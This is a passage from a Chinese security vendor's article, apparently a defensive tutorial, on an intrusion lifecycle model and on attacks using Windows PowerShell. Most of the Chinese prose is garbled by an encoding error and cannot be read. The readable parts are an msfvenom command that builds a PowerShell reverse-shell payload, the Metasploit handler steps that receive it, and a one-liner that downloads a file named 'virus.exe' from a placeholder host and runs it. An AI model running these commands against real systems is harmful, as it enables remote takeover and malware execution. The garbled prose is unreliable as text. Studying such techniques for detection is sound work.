Ìá½»ÐèÇó
*
*

*
*
*
Á¢¼´Ìá½»
µã»÷¡±Á¢¼´Ìá½»¡±£¬±íÃ÷ÎÒÀí½â²¢Í¬Òâ ¡¶»Æ½ð³Ç¿Æ¼¼Òþ˽Ìõ¿î¡·

logo

    ²úÆ·Óë·þÎñ
    ½â¾ö·½°¸
    ¼¼ÊõÖ§³Ö
    ºÏ×÷·¢Õ¹
    ¹ØÓڻƽð³Ç

    ÉêÇëÊÔÓÃ
      ¡¶ÈëÇÖÉúÃüÖÜÆÚϸ·Öʵ¼ùÖ¸ÄÏ¡·£ºWindows PowerShell¹¥»÷
      ·¢²¼Ê±¼ä£º2021-07-28 ÔĶÁ´ÎÊý£º 413 ´Î

      »Æ½ð³Ç¿Æ¼¼ÎªÁ˸üºÃµØ½øÐÐÈëÇÖ¼ì²âºÍ·ÀÓù£¬²ÎÕÕ¸÷Öֻƽð³Ç¹ÙÍøÍþв¿ò¼ÜºÍ×ÔÉíµÄʵ¼ùÓë˼¿¼£¬Ìá³öÁË»ùÓÚÈëÇÖÉúÃüÖÜÆÚµÄ¹¥»÷¹ÜÀíÄ£ÐÍ¡£


      ×÷Ϊ»Æ½ð³ÇÐÂÒ»´ú»Æ½ð³Ç¹ÙÍø¼Ü¹¹µÄÈý´óÖ§ÖùÖ®Ò»¡£ÈëÇÖÉúÃüÖÜÆÚv1.0°ÑÈëÇÖ¹ý³Ì»®·ÖΪ7¸ö½×¶Î£ºÌ½Ë÷·¢ÏÖ¡¢ÈëÇֺ͸ÐȾ¡¢Ì½Ë÷¸ÐÖª¡¢´«²¥¡¢³Ö¾Ã»¯¡¢¹¥»÷ºÍÀûÓᢻָ´¡£ÈëÇÖÉúÃüÖÜÆÚv1.0ͬÑùÒÔATT&CK×÷Ϊ»ù±¾Õ½Êõ֪ʶ¿â£¬Æ¥Åäµ½²»Í¬µÄÈëÇֽ׶Ρ£ÐèҪעÒâµÄÊÇ£¬²¢·ÇËùÓеÄÈëÇÖ¶¼»á¾­ÀúÕâ7¸ö½×¶Î£¬Ò²Ã»Óоø¶ÔµÄÏßÐÔ´ÎÐò¡£


      1£©Ì½Ë÷·¢ÏÖ


      ÔÚÕâ¸ö½×¶ÎÖУ¬¹¥»÷Õß»áÏÈËø¶¨¹¥»÷¶ÔÏó£¬È»ºóÀûÓÃijЩ¼¼ÊõÊֶΣ¬¾¡¿ÉÄÜ¶àµØ»ñȡĿ±ê±©Â¶³öÀ´µÄÐÅÏ¢£¬Èçͨ¹ý¶Ë¿ÚɨÃè¡¢Ö¸ÎÆÌ½²âµÈ·½Ê½£¬·¢ÏÖÃô¸Ð¶Ë¿Ú¼°°æ±¾ÐÅÏ¢£¬½ø¶øÑ°ÕÒ¹¥»÷µã£¬ÎªÏÂÒ»²½ÈëÇÖ×ö×¼±¸¡£


      2£©ÈëÇֺ͸ÐȾ


      ÔÚÕâ¸ö½×¶Î£¬¹¥»÷Õß»á¸ù¾Ý¡°Ì½Ë÷·¢ÏÖ¡±½×¶ÎËù·¢ÏÖµÄÖØÒªÐÅÏ¢£¬À´¶ÔÄ¿±ê±©Â¶³öµÄ¹¥»÷Ãæ½øÐй¥»÷³¢ÊÔ£¬ÔÚ¡°Ì½Ë÷·¢ÏÖ¡±½×¶ÎÊÕ¼¯µ½µÄÐÅÏ¢Ô½¶à£¬¹¥»÷¶ÔÏóËù±©Â¶µÄ¹¥»÷ÃæÒ²¾ÍÔ½¶à£¬¹¥»÷¸üÒ׳ɹ¦¡£


      3£©Ì½Ë÷¸ÐÖª


      ¹¥»÷ÕßÔڳɹ¦½øÈëϵͳÄÚ²¿ºó£¬ÓÉÓÚÊÇÊ״νøÈëËùÒÔ»á³öÏÖ¶ÔÄÚ²¿»·¾³²»ÊìϤµÄÇé¿ö£¬Õâʱ¹¥»÷Õߵ͝×÷Ò»°ã»áÊǶԵ±Ç°Ëù´¦»·¾³½øÐÐ̽Ë÷£¬ÃþÇåÄÚ²¿´óÖµÄÍøÂç½á¹¹£¬³£³£°éËæ×ű»ÈëÇÖ±¾»úµÄÃô¸ÐÐÅÏ¢ÊÕ¼¯ÒÔ¼°¶ÔÄÚÍø´óÁ¿µÄ¶Ë¿Ú½øÐÐɨÃ裬ºóÐø¸ù¾Ý¹¥»÷ÕßµÄÄ¿µÄ½øÐÐÏÂÒ»²½²Ù×÷¡£


      4£©´«²¥


      Ôڴ˽׶Σ¬¹¥»÷Õ߸ù¾ÝÉÏÒ»½×¶ÎÔÚÄÚÍøÌ½Ë÷¸ÐÖªÊÕ¼¯µ½µÄÐÅÏ¢£¬Ñ¡ÔñÌØ¶¨µÄ¹¥»÷ÊÖ·¨¡£ÈçÈô·¢ÏÖÄÚ²¿ÊÇÓò»·¾³£¬¹¥»÷Õß¿ÉÄ᳢ܻÊÔÏȹ¥ÆÆÓò¿Ø·þÎñÆ÷£¬ÔÙ´«²¥ÆäËû»úÆ÷¡£ÈôÊǹ¤×÷×é»·¾³£¬¿ÉÄÜ»áÀûÓÃÊÕ¼¯µ½µÄ¶Ë¿ÚºÍ·þÎñÐÅÏ¢£¬Ñ¡ÔñÌØ¶¨Â©¶´½øÐÐÅúÁ¿É¨Ãè¹¥»÷£¬À´¾¡¿ÉÄÜ¶àµØ¼ÌÐø»ñµÃÆäËû¼ÆËã»úµÄ¿ØÖÆÈ¨¡£


      5£©³Ö¾Ã»¯


      ¹¥»÷ÕßÔÚ¶Ô×ʲú½øÐжñÒâ²Ù×÷ºó£¬ÎªÁËÄܹ»¼õÉÙÔÙ´ÎÁ¬½ÓµÄ¹¥»÷³É±¾£¬·½±ãÏ´νøÈ룬»á½øÐС°ÁôºóÃÅ¡±µÄ²Ù×÷£¬³£¼ûµÄºóÃÅÈ磺½¨Á¢¼Æ»®ÈÎÎñ£¬¶¨Ê±Á¬½ÓÔ¶³Ì·þÎñÆ÷£»ÉèÖÿª»úÆô¶¯³ÌÐò£¬ÔÚÿ´Î¿ª»úʱ´¥·¢Ö´ÐÐÌØ¶¨¶ñÒâ³ÌÐò£»Ð½¨ÏµÍ³¹ÜÀíÔ±Õ˺ŵȡ£ÕâÑù±ãÓÚ¹¥»÷ÕßÏ´οìËٵǼ²¢¿ØÖƸÃϵͳ¡£


      6£©¹¥»÷ºÍÀûÓÃ


      ¹¥»÷ÕßÔڴ˽׶αã»á¿ªÊ¼¶ÔÄ¿±ê×ʲú½øÐжñÒâ²Ù×÷£¬°´ÕÕ¹¥»÷ÕßÒâÔ¸£¬¶ÔÄÜÀûÓõÄÊý¾Ý½øÐÐÇÔÈ¡¡¢ÀûÓã»¶Ô²Ù×÷ϵͳ¡¢Ãô¸ÐÎļþ½øÐÐÆÆ»µ¡¢É¾³ý¡£ËùÓеķÀÓùÊֶζ¼Ó¦¸Ã¼«Á¦×èÖ¹¹¥»÷Õß½øÐе½ÕâÒ»½×¶Î¡£


      7£©»Ö¸´


      ¹¥»÷ÕßÔÚÖ´ÐÐËùÓеĹ¥»÷²Ù×÷ʱ£¬ÍùÍù»áÔÚϵͳÉÏÁôÏ´óÁ¿µÄÐÐΪÈÕÖ¾£¬Òò´ËÔÚÕâÒ»½×¶Î£¬¹¥»÷Õß»á¶Ô¼Ç¼×ÔÉíºÛ¼£µÄËùÓÐÈÕÖ¾½øÐд¦Àí£¬»òɾ³ý»ò»ìÏý£¬´Ó¶øÏûÃðÖ¤¾Ý£¬ÌÓ±Ü×·×Ù¡£


      ¡°

      ±¾ÏµÁÐÎÄÕ»ùÓڻƽð³Ç¿Æ¼¼ÈëÇÖÉúÃüÖÜÆÚ1.0¼Ü¹¹£¬Ï¸·Ö¸ö½×¶Î¹¥»÷Õߵij£Óù¥»÷ÊֶΣ¬²¢¶ÔÏà¹Ø¹¥»÷ÊֶεľßÌåʵʩ·½Ê½½øÐÐÖðÒ»ÆÊÎö£¬Îª»Æ½ð³Ç¹ÙÍø·ÀÓù½¨ÉèÌṩÓÐÁ¦ÖªÊ¶²¹³äºÍ·´ÖÆ×¼±¸¡£


      Windows PowerShell¹¥»÷

      ̽Ë÷·¢ÏÖ¡¢ÈëÇֺ͸ÐȾ¡¢Ì½Ë÷¸ÐÖª

      ´«²¥¡¢¹¥»÷ºÍÀûÓᢳ־û¯½×¶Î


      Windows PowerShellÊÇÒ»ÖÖÃüÁîÐÐÍâ¿Ç³ÌÐòºÍ½Å±¾»·¾³£¬ËüÄÚÖÃÔÚÿ¸öÊÜÖ§³ÖµÄWindows°æ±¾ÖУ¨Windows 7/Windows 2008 R2ºÍ¸ü¸ß°æ±¾£©£¬Ê¹ÃüÁîÐÐÓû§ºÍ½Å±¾±àдÕß¿ÉÒÔÀûÓÃ.NET FrameworkµÄÇ¿´ó¹¦ÄÜ¡£


      ÔÚÉøÍ¸²âÊÔÖУ¬PowerShellÊDz»ÄܺöÂÔµÄÒ»¸ö»·½Ú£¬¶øÇÒÈÔÔÚ²»¶ÏµØ¸üкͷ¢Õ¹£¬Ëü¾ßÓÐÁîÈËÄÑÒÔÖÃÐŵÄÁé»îÐԺ͹¦ÄÜ»¯¹ÜÀíWindowsϵͳµÄÄÜÁ¦¡£Ò»µ©¹¥»÷Õß¿ÉÒÔÔÚһ̨¼ÆËã»úÉÏÔËÐдúÂ룬¾Í»áÏÂÔØPowerShell½Å±¾Îļþ£¨.ps1£©µ½´ÅÅÌÖÐÖ´ÐУ¬ÉõÖÁÎÞÐëдµ½´ÅÅÌÖÐÖ´ÐУ¬Ëü¿ÉÒÔÖ±½ÓÔÚÄÚ´æÖÐÔËÐС£ÕâÐ©ÌØµãʹµÃPowerShellÔÚ»ñµÃºÍ±£³Ö¶ÔϵͳµÄ·ÃÎÊȨÏÞʱ£¬³ÉΪ¹¥»÷ÕßÊ×Ñ¡µÄ¹¥»÷ÊֶΡ£


      ÀûÓÃPowerShellµÄÖî¶àÌØµã£¬¹¥»÷Õß¿ÉÒÔ³ÖÐø¹¥»÷¶ø²»±»ÇáÒ×·¢ÏÖ¡£Òò´Ë£¬powershellÔÚÈëÇÖ¹ý³ÌµÄ¶à¸öÉúÃüÖÜÆÚÁ÷³Ì¶¼·¢»Ó×ÅÖØÒª×÷Óã¬ÒÔ°ïÖú¹¥»÷ÕßÍê³É¸÷Àà²Ù×÷¡£´ÓÈëÇÖÉúÃüÖÜÆÚ½Ç¶È·ÖÎö£¬powershell¿É×÷ÓÃÓÚ¹¥»÷Õß̽Ë÷·¢ÏÖ¡¢ÈëÇֺ͸ÐȾ¡¢Ì½Ë÷¸ÐÖª¡¢´«²¥¡¢¹¥»÷ºÍÀûÓᢳ־û¯½×¶ÎÁù¸ö½×¶Î¡£


      ´Ó¹¥»÷ÐÐΪÁ´ÌõµÄÉÏÏÂÎÄÀ´¿´£¬Õë¶ÔpowershellµÄÐÐΪÁ´ÌõÊäÈëÊä³öÈçÏ¡£


      ÊäÈ룺µ÷ÓÃpowershellµ÷Ó÷½Ê½£¨±¾µØµ÷Óá¢Ô¶³Ìµ÷Óã©¡¢powershellµ÷ÓÃʱ¼ä¡¢powershellµ÷ÓÃÕß¡¢Ö´ÐеÄpowershellÃüÁî¡¢Ö´ÐеÄpowershell½Å±¾µÈ¡£


      Êä³ö£ºÖ´ÐÐPowerShellÃüÁîºóµÄÊä³ö½á¹û¡¢Ö´ÐÐPowerShell½Å±¾ºóµÄÊä³ö½á¹û¡¢powershellÃüÁî»ò½Å±¾µ÷Óõĺ¯ÊýµÈ¡£


      Õë¶Ôpowershell£¬Ä¿Ç°Ö÷ÒªÓÐÒÔϼ¸ÖÖ³£ÓÃÊֶΣº


      1£®Ê¹ÓÃPowerShell½øÐж˿ÚɨÃè


      2£®Ö´ÐÐPowerShell¶ñÒâÓÐЧ¸ºÔØ£¬ÀýÈçʹÓÃPowerShell½Å±¾£¬·´µ¯shellµ½metasploit


      ²Ù×÷»·¾³£º±¾»úkali ,ip:192.168.215.151  ±»¹¥»÷Õßwin7,ip:192.168.215.148


      ÍøÂç»·¾³£º¾ÖÓòÍø


      ˼·£ºÓÃkaliµÄmsfvenomÉú³ÉÒ»¸öºóÃÅ£¬Æô¶¯msf¼àÌýÏàÓ¦¶Ë¿Ú£¬ÈÃÄ¿±êÖ÷»úÖ´Ðм´¿É·´µ¯Ò»¸öshell


      (1)Ê×ÏÈÖ´ÐÐmsfvenom -p windows/x64/meterpreter/reverse_tcplhost=192.168.215.151 lport=6666 -f psh-reflection>test.ps1£¬Éú³ÉÒ»¸öpowershell½Å±¾£¬lhostÊÇÖ´ÐкóÃźóËùÒª·´µ¯µÄip,lportÊǶ˿ڡ£


      (2)Æô¶¯msfconsole


      (3)Æô¶¯msfºó²½ÖèÈçÏ£º


      a.   ʹÓÃuseexploit/multi/handlerÄ£¿é


      b.   ÉèÖÃpayload£¬set payload windows/x64/meterpreter/reverse_tcp£¬ÕâÊÇÒ»¸ö·´µ¯shellµÄpayload


      c.   ÉèÖÃlhostΪ±¾»úµÄip192.168.215.151


      d.   ÉèÖÃlportΪ6666£¬ÓëµÚÒ»²½ÉèÖõÄpowershell½Å±¾ÖеĶ˿ÚÒ»Ö¡£


      e.   ÉèÖÃÍê³Éºó£¬Ö´ÐÐrun


      (4)ÔÚwindows»úÆ÷ÖÐÖ´ÐÐpowershell½Å±¾£¬´ËʱkaliÖлáÏÔʾÈçϽá¹û£º


      (5)ÔÚmeterpreterÖÐÊäÈëshell£¬¼´¿ÉÄõ½ÏàÓ¦µÄshell£¬Ö´ÐÐÒ»ÏÂÃüÁîipconfig£¬³É¹¦»ØÏÔ¡£


      3£®Ê¹ÓÃPowerShell´ÓInternetÏÂÔØ²¢ÔËÐпÉÖ´ÐÐÎļþ£¬ÀýÈçÖ´ÐÐÒÔÏÂÃüÁԶ³ÌÏÂÔØ²¡¶¾Îļþ²¢Ö´ÐУº


      powershell (new-objectSystem.Net.WebClient).DownloadFile('http://ip/virus.exe','c:downloadvirus.exe');start-process'c:downloadvirus.exe'

      Ãâ·ÑÊÔÓÃ
      ·þÎñÈÈÏß

      ÂíÉÏ×Éѯ

      400-811-3777

      »Øµ½¶¥²¿
    • ¡¾ÍøÕ¾µØÍ¼¡¿¡¾sitemap¡¿